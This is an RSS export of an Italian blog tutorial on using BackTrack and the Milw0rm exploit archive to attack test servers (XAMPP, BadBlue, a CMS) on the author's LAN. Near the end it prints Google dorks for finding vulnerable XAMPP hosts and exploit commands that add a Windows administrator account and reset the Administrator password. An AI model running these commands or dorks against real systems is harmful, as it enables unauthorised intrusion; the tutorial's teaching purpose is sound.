<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>«back&#124;track~blog &#187; /Penetration</title>
	<atom:link href="http://carlitobrigante.wordpress.com/category/penetration/feed/" rel="self" type="application/rss+xml" />
	<link>http://carlitobrigante.wordpress.com</link>
	<description>Luogo di studio della security-distro  BackTrack GNU/Linux</description>
	<lastBuildDate>Thu, 18 Jun 2009 17:35:11 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>it</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='carlitobrigante.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/151ab79cdd13eafaa57ed2702573287c?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>«back&#124;track~blog &#187; /Penetration</title>
		<link>http://carlitobrigante.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://carlitobrigante.wordpress.com/osd.xml" title="«back|track~blog" />
		<item>
		<title>BackTrack &amp; Milw0rm Exploits Archive [+video]</title>
		<link>http://carlitobrigante.wordpress.com/2008/07/08/backtrack-milw0rm-exploits-archive-video-2/</link>
		<comments>http://carlitobrigante.wordpress.com/2008/07/08/backtrack-milw0rm-exploits-archive-video-2/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 02:23:34 +0000</pubDate>
		<dc:creator>brigante~</dc:creator>
				<category><![CDATA[/General]]></category>
		<category><![CDATA[/Penetration]]></category>

		<guid isPermaLink="false">http://carlitobrigante.wordpress.com/?p=517</guid>
		<description><![CDATA[
***
Ciao a tutti,
eccoci arrivati a fare un altro dei nostri test che , personalmente , reputo tra i più  interessanti.
Il tutorial che state per leggere comprende un pentesting , quello che andremo a fare in pratica è: come utilizzare la nostra BackTrack per fare un pentesting tramite l&#8217; uso dell&#8217; archivio degli exploits di [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=517&subd=carlitobrigante&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p align="center"><a title="milw0rm_cracker.jpg" rel="attachment wp-att-315" href="http://carlitobrigante.wordpress.com/2008/07/08/backtrack-milw0rm-exploits-archive-video-2/attachment/315/"><img src="http://carlitobrigante.files.wordpress.com/2008/02/milw0rm_cracker.jpg?w=447&#038;h=89" alt="milw0rm_cracker.jpg" width="447" height="89" /></a></p>
<p align="center">***</p>
<p>Ciao a tutti,</p>
<p>eccoci arrivati a fare un altro dei nostri test che , personalmente , reputo tra i più  interessanti.</p>
<p>Il tutorial che state per leggere comprende un pentesting , quello che andremo a fare in pratica è: come utilizzare la nostra <span style="text-decoration:underline;"><strong>BackTrack</strong></span> per fare un pentesting tramite l&#8217; uso dell&#8217; archivio degli exploits di <strong>milw0rm.com</strong>.</p>
<p>Per eseguire il nostro pentesting ci serviremo di:</p>
<ul>
<li><em>L&#8217; <strong>Archivio </strong>degli <strong>Exploits</strong> di </em><span style="text-decoration:underline;"><strong>Milw0rm</strong></span><span style="text-decoration:underline;">.</span></li>
<li><em><strong>nMap</strong> , per la scansione con opzioni per il <span style="text-decoration:underline;">fingerprinting</span>.<br />
</em></li>
<li><em><strong>Dsniff</strong> , esclusivamente per lo sniffing delle credenziali<span style="text-decoration:underline;"> da localhost.</span></em></li>
</ul>
<p style="text-align:center;"><strong>***</strong></p>
<p><em>Ci tengo a dire che in questo tutorial non è stato fatto danno ad alcuno , <strong>tutti si svolge nella mia LAN </strong>. Ho provato a chiedere l&#8217; autorizzazione a vari sysadmin , ma dopo aver upgradado le loro cosette non mi hanno nemmeno risposto&#8230; &#8230;.<strong>0</strong> su <strong>9</strong>.</em></p>
<p><em>Altra cosa importrante che mi sento di aggiungere è di <span style="text-decoration:underline;">ringraziare: <strong>KaB0T</strong> per la disponibilità ed  <strong>EikaF</strong></span> , senza il quale avremmo fatto un altro video lento ed incasinato , anche se da questo punto di vista dobbiamo ancora migliorare credo che si veda la differenza &#8220;in meglio&#8221; nei confronti dei video precedenti.</em></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:center;"><em>tutto il tutorial è referente interamente al video che abbiamo fatto , dal nome </em></p>
<p style="text-align:center;"><em><span style="text-decoration:underline;"><strong>&#8220;BackTrack &amp; Milw0rm Exploits Archive&#8221;</strong></span> , naturalmente presente nella pagina <a href="http://carlitobrigante.wordpress.com/video/"><strong>/video</strong></a>.</em></p>
<p style="text-align:center;"><em>è stato girato interamente con <strong>Fluxbox</strong> , ma le sezioni che io uso per Fluxbox sono identiche a quelle impostate di default in <strong>BackTrack</strong> per<strong> KDE</strong> , quindi non cambia nulla&#8230;</em></p>
<p style="text-align:center;"><em>&#8230;Il video è scaricabile da<a href="http://www.mediafire.com/?1dsx2e9vxxy" target="_blank"><strong><span style="text-decoration:underline;"> Quì</span></strong></a>.</em></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Innanzitutto voglio fare delle piccole precisazioni:</p>
<p>Il pc nella mia LAN ha un multiboot con: WinServer-2003.spk2<em>-(FamilyConnection-CMS)-</em> , WinServer-2000.spk3<em>-(-XAMPP)-</em> , Windows Xp spk2<em>-(BadBlue-WebServerFileSharing)-</em>.</p>
<p>Sono stati usati in tutto 3 exploits , per altrettante demo nel video.</p>
<p><span style="text-decoration:underline;">Uno degli exploits </span>è un exploit scritto da <a href="http://carlitobrigante.wordpress.com/2008/04/27/il-nostro-addio-a-retrogod/"><strong>rGod</strong></a> e diretto verso uno<strong> Xampp</strong>&#8230; , <em>(-nel video ultima demo-)</em> ,  &#8230;cos&#8217;é uno Xampp?</p>
<p>lo Xampp è un &#8220;aggregato&#8221; di webserver e database , con tanto di interprete PHP , in pratica con lo xampp ho instalato sul sistema , poi preso come &#8220;vittima&#8221; , il webserver Apache , il database MySql e l&#8217;interprete PHP , per saperne di più potete darvi una leggerissima letta alla nostra pagina <a href="http://carlitobrigante.wordpress.com/inf0-it/" target="_blank"><strong>/Inf0-[IT]</strong></a></p>
<p><span style="text-decoration:underline;">Un altro </span>exploit , <em>(-nel video seconda demo-)</em> , (scritto dal<em> <a href="http://citec.us/" target="_blank">CWH</a> Underground Hacking Team) </em>, invece è diretto contro un CMS , il <strong>FamilyConnection CMS</strong> , una piattaforma tipo WordPress , solo che viene usata molto fra community.</p>
<p><span style="text-decoration:underline;">L&#8217; altro</span> exploit , <em>(-nel video prima demo-)</em> , (scritto da<a href="http://www.milw0rm.com/author/709" target="_blank"> </a><em><a href="http://www.milw0rm.com/author/709" target="_blank">J.Cervini</a> su un Bug scoperto da <a href="http://luigi.eliott-ness.com/" target="_blank">L.Auriemma</a>) </em>, è diretto invece verso un webserver , il <strong>BadBlue</strong>. Il BadBlue è un semplice webserver utilizzato per il filesharing tra conoscenti , installandosi sul proprio sistema il BadBlue si possono in pratica condividere files di tutti i tipi.</p>
<p>tutti questi exploits utilizzati sono naturalmente corrispondenti ad una specifica versione dei corrispettivi server , CMS , applicazioni eccetera&#8230;</p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Ma facciamo una breve descrizione di cio che stiamo per fare&#8230;</p>
<p>Il team di <strong><a href="http://www.remote-exploit.org/about.html">remote-exploit.org</a> </strong>, ha pensato bene di inserie un tool da riga di comando che permetta a tutti gli user di <strong>BackTrack</strong> di avere a disposizione ,<em> (anche OFF-Line)</em> , un archivio di exploits per effettuare , in ogni situazione , un pentesting con il massimo grado di efficacia e lo ha fatto inserendo in <strong>BackTrack</strong> l&#8217; archivio exploits di <strong>Milw0rm</strong>.</p>
<p><strong><a href="http://carlitobrigante.wordpress.com">Milw0rm</a> </strong>è un sito che raccoglie centinaia di <a href="http://carlitobrigante.wordpress.com/whitepaper-2/"><strong>Exploit</strong></a><a href="http://carlitobrigante.wordpress.com/whitepaper-2/"> &amp; <strong>Shellcodes</strong></a> ,  scritti in vari tipi di linguaggi di programmazione e per tutti i tipi di piattaforme ed applicazioni , web e non.</p>
<p style="text-align:center;"><span style="text-decoration:underline;"><strong>[installazione Archivio per la BackTrack3.final]</strong></span></p>
<p>Fino alla versione <strong>3.beta</strong> della BackTrack un archivio degli exploits di milw0rm era inserito da installazione , dalla <strong>3.final</strong> no , ma basta installarselo tramite  <span style="text-decoration:underline;"><strong>Fast-Track</strong> </span>, (tool multifunzione di cui scriveremo a breve&#8230;), quindi:</p>
<p><strong><em>KdeStartMenù</em> </strong>&#8211;&gt; <em><strong>BackTrack</strong></em> &#8211;&gt; <em><strong>Penetration</strong></em> &#8211;&gt; <strong>Fast-Track</strong> ,</p>
<p>dal menù principale di <span style="text-decoration:underline;"><em>Fast-Track</em></span> scegliete la modalità &#8220;<strong>interactive</strong>&#8220;:</p>
<p><strong><span style="color:#ff0000;">bt~</span><span style="color:#0000ff;"># </span></strong><strong>./fast-track.py -i</strong></p>
<p>In questo modo otterrete un altro menù , scegliete l&#8217; opzione <strong>1</strong> , quindi la <strong>4</strong> e vi si installerà l&#8217; archivio <strong>milw0rm</strong>. con lo script per l&#8217; <strong>UPdate</strong>.</p>
<p style="text-align:center;">***</p>
<p><span style="color:#ff0000;"> Fast-Track Updates</span></p>
<p><span style="color:#ff0000;">Enter a number to update</span></p>
<p><span style="color:#ff0000;">1. Update Fast-Track<br />
2. Metasploit 3 Update<br />
3. Aircrack-NG Update<br />
4. Milw0rm Update<br />
5. Nikto Plugin Update<br />
6. W3AF Update<br />
7. SQLMap Update<br />
8. Installation Menu<br />
9. Update Everything<br />
10. Return to Main Menu</span></p>
<p><span style="color:#ff0000;">Enter number:</span></p>
<p style="text-align:center;">***</p>
<p>Oltre a <strong>Milw0rm</strong> ci sono molti altri siti che raccolgono , ed hanno un proprio archivio di exploits e di shellcodes , ma visto che tratteremo l&#8217; uso di un archivio già presente in <strong>BackTrack</strong> , ( o almeno installabile &#8211; per la 3.final ) , descriveremo ed effettueremo un pentesting con l&#8217; archivio di <strong>Milw0rm</strong>.</p>
<p>È possibile trovare sul sito Milw0rm materiale quali:  <strong>documenti</strong> , <strong>videotutorial</strong> , <strong>withepaper</strong> , il <a href="http://www.milw0rm.com/cracker/insert.php"><em><strong>password cracker</strong></em></a> , un <a href="http://www.milw0rm.com/mil-dic.php">dizionario</a> , ed è possibile inoltre ottenere tramite download lo stesso <em><span style="text-decoration:underline;"><strong><a href="http://www.milw0rm.com/sploits/milw0rm.tar.bz2">archivio degli exploits.</a></strong> </span></em></p>
<p>Una piccola , ma molto comoda , utility che Milw0rm offre è l&#8217; estensione per <strong>Firefox</strong> che abilita la ricerca sullo stesso sito , volendo l&#8217; opzione è disponibile <a href="http://wired.s6n.com/files/jathias/milw0rm_search.htm"><span style="text-decoration:underline;"><em><strong>quì</strong></em></span></a>.</p>
<p><strong>Milw0rm</strong> è un sito che , insieme ad altri quali , solo per fare un esempio , <a href="http://securityreason.com/"><strong>SecurityReason</strong></a> &#8211; <strong><a href="http://www.securityfocus.com/">Security Focus</a> </strong>,<a href="http://packetstorm.offensive-security.com/"><strong> Packet Storm</strong></a> , <a href="http://www.vulnerabilityassessment.co.uk/"><strong>Vulnerability Assestament</strong></a> , <span style="text-decoration:underline;"><a href="http://www.securiteam.com/exploits/"><strong>Securiteam</strong></a></span> &#8230;eccetera , ottiene nuovi exploits in maniera abbastanza &#8220;<em><span style="text-decoration:underline;">lesta</span></em>&#8221; , tutti gli amministratori di sistemi traggono importanti informazioni da milw0rm , personalmente non credo che chiunque voglia essere al passo con la scoperta di nuove vulnerabilità possa fare a meno di passare per un sito come Milw0rm.</p>
<p><em><strong>N</strong>on posso però evitare di dire che non tutte le vulnerabilità vengono rilevate ; che non tutte quelle rilevate vengono rivelate e che non si può essere <strong><span style="text-decoration:underline;">MAI</span></strong> certi al 100% di conoscere tutte le vulnerabilità , è una cosa impossibile , ma tenersi aggiornati periodicamente è una cosa fondamentale , farlo tramite un sito di exploit pubblici come quelli che vi ho appena elencato è sicuramente un ottimo inizio.</em></p>
<p>Gli exploit che non sono ancora stati rivelati , che prendono il nome di 0day , sono quelli che possono causare più problemi di tutti , visto che la loro effettiva funzione viene scoperta a danno già fatto.</p>
<p>Va detto comunque che ci sono anche <strong>0day</strong> che vengono rivelati direttamente dai siti che vi ho citato sopra , ma questa è una cosa che dipende da coloro che li rendono pubblici.</p>
<p>Fatte queste dovute premesse credo sia giusto scrivere qualcosa anche a riguardo degli exploits , almeno per rendere l&#8217; idea a tutti di quello che stiamo facendo.</p>
<p>Un exploit è un programma , script , che permette di sfruttare delle vulnerabilità insite in applicazioni , programmi di varia natura e funzione , database o anche una semplice pagina web e che ci permette di poter eseguire sul sistema preso come obbiettivo dell&#8217; attacco , del codice &#8220;maligno&#8221; , dannoso , cosa che normalmente non è possibile fare. L&#8217; exploit , inteso come programma , o script , può rappresentare anche una stringa unica , come ad esempio nel caso dell&#8217; <strong>Sql-Injection</strong> , basta andare su Milw0rm per rendersene conto.</p>
<p>Un <strong>exploit</strong> può essere scritto in vari tipi di linguaggii di programmazione , dal <strong>C</strong> al <strong>python</strong> , dal <strong>Php</strong> al<strong> Perl </strong>e così via&#8230;   &#8230;e molte volte necessitano di compilazione.</p>
<p>Di seguito elencherò alcuni tipi di attacco , ma lo farò seguendo il metodo che ci interessa in questo tutorial , quindi secondo la suddivisione dell&#8217; archivio degli exploits di milw0rm in rete , sullo stesso sito milw0rm , oppure secondo l&#8217; archivio in <strong>BackTrack</strong>.</p>
<p style="text-align:center;"><span style="text-decoration:underline;"><strong>[UPdate Milw0rm Archive]</strong></span></p>
<p>Facciamo , come bisognerebbe fare ogni qualvolta si intende eseguire un test di penetrazione tramite degli exploits , un <strong>UPdate</strong> dell&#8217; <strong>archivio</strong> degli <strong>Exploits</strong> di <strong>Milw0rm</strong> , andiamo quindi in:</p>
<p><em><strong>KdeStart</strong> &#8211;&gt;<strong> BackTrack -</strong>-&gt; <strong>Penetration -</strong>-&gt; <strong>Milw0rmExploitArchive</strong>-&gt;</em><strong> &#8220;&#8230;&#8221; </strong>, e da quì selezioniamo:<strong> &#8220;<span style="text-decoration:underline;">Update Milw0rm Archive</span>&#8221; </strong>, in questo modo ci si aprirà una shell che automaticamente effettuerà l&#8217; UPdate , otteniamo così tutto l&#8217; archivio aggiornato degli exploits da milw0rm.com.</p>
<p style="text-align:center;"><span style="text-decoration:underline;"><strong>[Ricerca</strong><strong> exploits]</strong></span></p>
<p style="text-align:center;">Gli exploits che abbiamo ottenuto tramite il nostro <strong>UPdate</strong> si trovano nella seguente directory:</p>
<p><strong>/pentest/exploits/milw0rm/ &#8220;&#8230;&#8230;&#8230;&#8221;</strong></p>
<p>Ora , appena terminata la procedura di UPdate , andiamo nella directory indicata sopra direttamente da <strong>Konsole</strong> , con <strong>xTerm</strong> oppure con <strong>Konqueror</strong> ,  da quì possiamo vedere che nella directory <strong>~/Milw0rm/</strong> sono contenute altre subdirectory , ognuna identifica una serie di exploits equivalenti a determinati tipi di piattaforme   &#8230;<strong>platforms</strong> , o porte &#8230;<strong>rport.</strong></p>
<p>Dalle subdirectory in <strong>~/platforms/&#8230;</strong> <strong>windows</strong> , <strong>unix</strong> <strong>, solaris</strong> &#8230;eccetera si dividono poi in attacchi da <strong>remote</strong> o <strong>local.</strong></p>
<p style="text-align:center;"><strong>***</strong></p>
<p><span style="text-decoration:underline;"><strong>Grazie</strong></span> ad una novità di <strong>./str0ke</strong> , (admin di <strong>milw0rm.com</strong>) , che ha creato una lista di exploits appositamente per <strong>BackTrack</strong> , (dal nome appunto <strong><em><span style="text-decoration:underline;">&#8220;sploitlist-bt.txt</span></em>&#8221; </strong>) , il metodo di ricerca per gli exploits che si trovano all&#8217; interno dell&#8217; archivio <strong>Milw0rm</strong> in <strong>BackTrack</strong> , si esegue  tramite il comando <a href="http://www.linux.it/~giammy/unix_linux_introduction/html/img51.html"><strong>grep</strong></a> , sempre da shell e naturalmente all&#8217; interno della directory che contiene le liste di exploits in formato <strong>*.txt</strong> , una dal nome <strong><span style="text-decoration:underline;">sploitlist.txt</span></strong> e l&#8217; altro <span style="text-decoration:underline;"><strong>sploitlist-bt.txt</strong></span></p>
<p>In questo modo , se ci serve ad esempio un exploit per il <strong>Vista </strong> , ci basterà dare il comando:</p>
<p><strong><span style="color:#ff0000;">bt~</span><span style="color:#0000ff;">#</span> grep Vista sploitlist-bt.txt </strong></p>
<p>e ci verranno restituite le subdirectory con gli exploits disponibili.</p>
<p>Per fare un semplice esempio , nel nostro caso , trattandosi per quanto riguarda il pentesting contro il sistema con Windows XP.professional , del webserver <strong>BadBlue</strong> andrò dapprima nella directory corretta e poi cercherò con il comando grep gli exploits disponibili , nel modo seguente:</p>
<p><strong><span style="color:#ff0000;">bt<span style="color:#0000ff;"> ~</span></span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">#</span><span style="color:#000000;"> cd /pentest/exploits/milw0rm/<br />
</span></span></strong></p>
<p><strong><span style="color:#ff0000;">bt<span style="color:#0000ff;"> milw0rm </span></span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">#</span><span style="color:#000000;"> grep BadBlue sploitlist-bt.txt</span></span></strong></p>
<p><em><span style="text-decoration:underline;">..ed ecco il risultato ottenuto.</span></em></p>
<p style="text-align:center;"><strong>***</strong></p>
<p><span style="color:#ff0000;">./platforms/windows/remote/845.c BadBlue 2.5 Easy File Sharing Remote Buffer Overflow<br />
./platforms/windows/remote/847.cpp BadBlue 2.55 Web Server Remote Buffer Overflow<br />
./platforms/windows/remote/4715.txt BadBlue &lt;= 2.72b Multiple Remote Vulnerabilities<br />
./platforms/windows/remote/4784.pl BadBlue 2.72 PassThru Remote Buffer Overflow Exploit<br />
./rport/80/845.c BadBlue 2.5 Easy File Sharing Remote Buffer Overflow<br />
./rport/80/847.cpp BadBlue 2.55 Web Server Remote Buffer Overflow<br />
./rport/80/4784.pl BadBlue 2.72 PassThru Remote Buffer Overflow Exploit</span><strong><span style="color:#ff0000;"><br />
</span></strong></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:center;"><span style="text-decoration:underline;"><strong>[Attacco con Exploits]</strong></span></p>
<p>Arrivati ai vari tipi di attacco facciamone , come è giusto , una brevissima descrizione fatta secondo le principali sigle su milw0rm , ovvero: <strong>DoS-PoC</strong> , <strong>Web-App</strong> , <strong>Shellcode</strong> ,  <strong>Local</strong> e <strong>Remote</strong></p>
<p style="text-align:left;"><span style="text-decoration:underline;"><em>[Attacco <strong>DoS</strong> e <strong>DDoS</strong>]:</em></span></p>
<p>La sigla <span style="text-decoration:underline;"><strong>DoS</strong></span> sta a significare<strong> Denial of Service</strong> , e la sigla <span style="text-decoration:underline;"><strong>DDos</strong></span> sta invece per <strong>Distribuite-Denial of Service</strong>.</p>
<p>Come dicono le stesse sigle , il successo di questo tipo di attacco sta nel <em>diniego</em> del servizio , distribuito nel secondo caso , (DDoS) , singolo nel primo.</p>
<p>Queste parole in stile &#8220;<em>traduzione</em>&#8221; , dovrebbero rendere già l&#8217;idea del significato di un attacco DoS oppure DDoS , il suo funzionamento sta nel far arrivare al sistema vittima un attacco , o un insieme di attacchi , che rendono inaccessibile il sistema ; ma come può avvenire ciò?</p>
<p>La risposta è facile: un sito , che si raggiunge con una connessione ad internet , può esserci negato quando ad esempio siamo senza banda , senza linea praticamente , e saturare la banda a disposizione del sistema potrebbe essere quindi già un metodo per effetuare un DoS. Un attacco alla banda di un sistema potrebbe avvenire ad esempio tramite un eccessivo numero di richieste di accesso , ed il sistema , se non preparato , non potrà che andare fuori uso.</p>
<p><em>È ancora oggi famoso ciò che accadde nel<a href="http://openskills.info/topic.php?ID=158"> Febraio del 2000</a> , quando al sistema di </em><em><strong>Yahoo!</strong> venne sferrato un attacco di tipo DDoS , e rimase inaccessibile per delle ore. L&#8217; attacco sferrato partì da centinaia di host in giro per la rete che a sua volta furono violati precedentemente.(<span style="text-decoration:underline;">&#8230;Tahnx! to <strong><a href="http://www.openskills.org/">OpenSkills</a></strong></span>)</em></p>
<p>Il sistema di attacco DoS non è compromettente , è facile capire che se viene effettuato un DoS tramite la saturazione di una banda , una volta che la stessa tornerà attiva i problemi svaniranno&#8230;. &#8230;.almeno fino al prossimo attacco (!?), ma non è comunque una cosa che compromette il sistema.</p>
<p><em><span style="text-decoration:underline;">[La sigla <strong>PoC</strong>]:</span></em></p>
<p>La sigla PoC sta a significare &#8220;<strong>Proof of concept</strong>&#8221; , abbozzo o progetto da terminare , inserita con lo scopo di dimostrare la fondatezza di un determinato progetto. Negli elenchi degli exploits sul sito milw0rm.com , la sigla PoC viene riportata quando coloro che scoprono il bug e ne scrivono successivamente l&#8217; exploit corrispondente , mostrano con delle spiegazioni l&#8217; eseguibilità del loro lavoro.</p>
<p>breve esempio:</p>
<p>nell&#8217; ultima demo del videotutorial si esegue un attacco verso uno Xampp , l&#8217; exploit come già detto scritto da rGod , contiene commentata una serie di stringhe che ne spiegano l&#8217; efficacia , questo il contenuto del <strong>PoC</strong> nell&#8217; exploit <strong>./3738.php</strong> di<strong> rGod</strong>&#8230;</p>
<p style="text-align:center;"><strong>***</strong></p>
<pre><span style="color:#ff0000;">mssql_connect() function is vulnerable to buffer overflow and
the host argument is totally unchecked. Also this shows a vulnerabilty in
ADODB library (which is in the include path, inside PEAR folder) in the
Connect method .

If you say that this should be not used for production purpose or
exposed to the outside world, try theese google dorks:

intitle:XAMPP intitle:windows intitle:version
intitle:XAMPP intitle:version intitle:1.6.0a +windows

note: I could use the INTO OUTFILE method through sql injection
to export some shell inside the /htdocs folder because we have FILE
privilege, but we have  magic_quotes_gpc on here. This is instead
possbile through the PhpMyAdmin default user/password.
note ii: PHP version is 5.2.1
note iii: bof is possible because mssql extension is enabled
by default in php.ini
*/</span></pre>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;"><span style="text-decoration:underline;"><em>[Attacco in <strong>local</strong>] :</em></span></p>
<p>L&#8217; attacco in local è quell&#8217; attacco che si svolge all&#8217; interno di una rete indipendende , anche se non del tutto , o si ha già comunque un certo accesso alla rete stessa. Un esempio può essere quello di fare dello sniffing nella propria LAN oppure acquisire i privilegi di amministratore del sistema da utente semplice. Un esempio di sniffing può essere quello che ho descritto nell&#8217; esempio fatto con<a href="http://carlitobrigante.wordpress.com/?s=ettercap"> <strong>Ettercap</strong></a> e che dimostra appunto come poter fare<span style="text-decoration:underline;"> &#8220;sniffing&#8221; di username e password all&#8217; interno di una LAN</span>.</p>
<p>Gli attacchi in local sono però di varia natura , anche se la maggiorparte , vista la questione di permessi , sono effettuati su sistemi M$Windows , ce ne sono anche molti per sistemi UNIX-based , l&#8217; exploit n° <a href="http://www.milw0rm.com/exploits/5092"><span style="text-decoration:underline;"><strong>5052</strong></span></a> ,<em>(quando parlo di numeri , mi rivolgo al numero occupato dall&#8217; exploit all&#8217; interno dell&#8217; archivio <span style="text-decoration:underline;">milw0rm</span>)</em>, infatti è proprio propenso al <strong>local root exploitation</strong> su sistemi <strong>GNU/Linux.</strong></p>
<p style="text-align:left;"><em><span style="text-decoration:underline;">[Attacco in <strong>remoto</strong>]: </span></em></p>
<p>L&#8217;attacco in remoto è quella tipologia di attacco che si effettua da una postazione totalmente estranea all&#8217; obbiettivo , che si trova quindi su di un altro dominio , e di cui non si ha nessun permesso d&#8217; accesso.</p>
<p>È logico capire che ogni tipo di attacco può o no essere fine a se stesso , oppure può essere utilizzato in concomitanza con altre tipologie di attacco.</p>
<p align="center"><strong>***</strong></p>
<p align="center"><em>In questo caso ho elencato esclusivamente alcuni tipi di attacco , solo per rendere l&#8217; idea , se si và sul sito milw0rm.com si possono trovare sigle del tipo <strong>RFI</strong> , <strong>LFI</strong> , <strong>Loca Root Exploits </strong>eccetera&#8230; , a tutte queste descrizioni sia giusto rimandarvi al <a href="http://it.wikipedia.org/wiki/Portale:Informatica"><span style="text-decoration:underline;">portale informatico</span><strong><span style="text-decoration:underline;"> </span></strong><span style="text-decoration:underline;">di </span><strong><span style="text-decoration:underline;">Wikipedia</span></strong></a></em><em>.<br />
</em></p>
<p align="center"><strong>*** </strong></p>
<p>Andiamo avanti con il tutorial , il primo pentesting , (terza demo nel video) ,  viene eseguito sullo Xampp , dalla directory esatta , come sopra eseguo da shell il comando:</p>
<p><strong><span style="color:#ff0000;">bt<span style="color:#0000ff;"> milw0rm </span></span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">#</span><span style="color:#000000;"> grep XAMPP sploitlist-bt.txt</span></span></strong></p>
<p><em><span style="text-decoration:underline;">ed eccone il risultato:</span></em></p>
<p><strong><span style="color:#ff0000;">./platforms/windows/remote/3738.php XAMPP for Windows &lt;= 1.6.0a mssql_connect() Remote BoF Exploit</span></strong></p>
<p><strong><span style="color:#ff0000;">./platforms/windows/local/4325.php XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit<br />
./rport/80/3738.php XAMPP for Windows &lt;= 1.6.0a mssql_connect() Remote BoF Exploit</span></strong></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;">L&#8217; exploit che useremo è il 3738.php , e per essere eseguito basta dare un occhiata alla matrice stessa dell&#8217; explot , basta dare da shell il comando come eseguibile preceduto dall&#8217; interprete quindi:</p>
<p style="text-align:left;"><strong>php ./3738.php</strong></p>
<p style="text-align:left;">il tutto naturalmente dopo essere entrati nelle directory elencate dal comando <strong>grep.</strong></p>
<p style="text-align:left;"><strong><span style="color:#ff0000;">bt</span> </strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">milw0rm </span></span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">#</span></span></strong><strong> cd platforms/windows/remote/</strong></p>
<p>Con il comando appena eseguito ci verrà elencata tutta la <em>&#8220;matrice&#8221; </em>dell&#8217; exploit , chi l&#8217; ha scritto , la piattaforma , il bug e in che modo deve essere eseguito , e infatti ecco il risultato&#8230;</p>
<p align="center"><strong>*** </strong></p>
<p><strong><span style="color:#ff0000;">bt</span> <span style="color:#0000ff;">remote</span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;"> </span></span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">#</span></span></strong><strong> </strong><strong>php ./3738.php</strong></p>
<p><span style="color:#ff0000;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
XAMPP for Windows &lt;= 1.6.0a adodb.php/mssql_connect() remote buffer overflow<br />
proof-of-concept exploit<br />
seh overwrite method / 2000 sp3 version<br />
mail: retrog at alice dot it<br />
site: http://retrogod.altervista.org<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</span></p>
<p><span style="color:#ff0000;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Usage: php ./3738.php host cmd OPTIONS<br />
host:      target server (ip/hostname)<br />
cmd:       a shell command<br />
Options:<br />
-p[port]:    specify a port other than 80<br />
-P[ip:port]: specify a proxy<br />
-S           only send the second packet<br />
Example:<br />
php ./3738.php localhost VER -P1.1.1.1:80<br />
php ./3738.php localhost NET USER sun tzu /ADD ^&amp;^&amp; NET LOCALGROUP<br />
Administrators /ADD sun -p81 -S<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</span></p>
<p align="center"><strong>***</strong></p>
<p><strong>C</strong>ome possiamo vedere dalla lista di informazioni che ci viene restituita all&#8217; interno della nostra shell , l&#8217; exploit per essere eseguito necessita di alcune informazioni. Ogni exploit per essere eseguito necessita di informazioni diverse , ci sono exploit compilati e da compilare , e tutti sono eseguibili con successo , naturalmente , solo se il sistema vittima è affetto dalla vulnerabilità che l&#8217; exploit andrà ad usare lo <strong>Xampp</strong> deve essere alla versione <strong>&lt;=1.6.0a </strong>, rigorosamente , come possiamo leggere dalla matrice stessa , per <strong>Windows</strong>.</p>
<p>Vediamo ora di eseguire l&#8217; exploit con i dovuti comandi&#8230;</p>
<p><em>Un esempio che ci viene mostrato dall&#8217; exploit è il seguente:</em></p>
<p><span style="color:#ff0000;"> php ./3738.php localhost VER -P1.1.1.1:80</span></p>
<p>Noi , avendo un server su cui provarlo , daremo il seguente comando da konsole:</p>
<p><strong>php ./3738.php 29.230.6.73 net user Administrator komintern</strong></p>
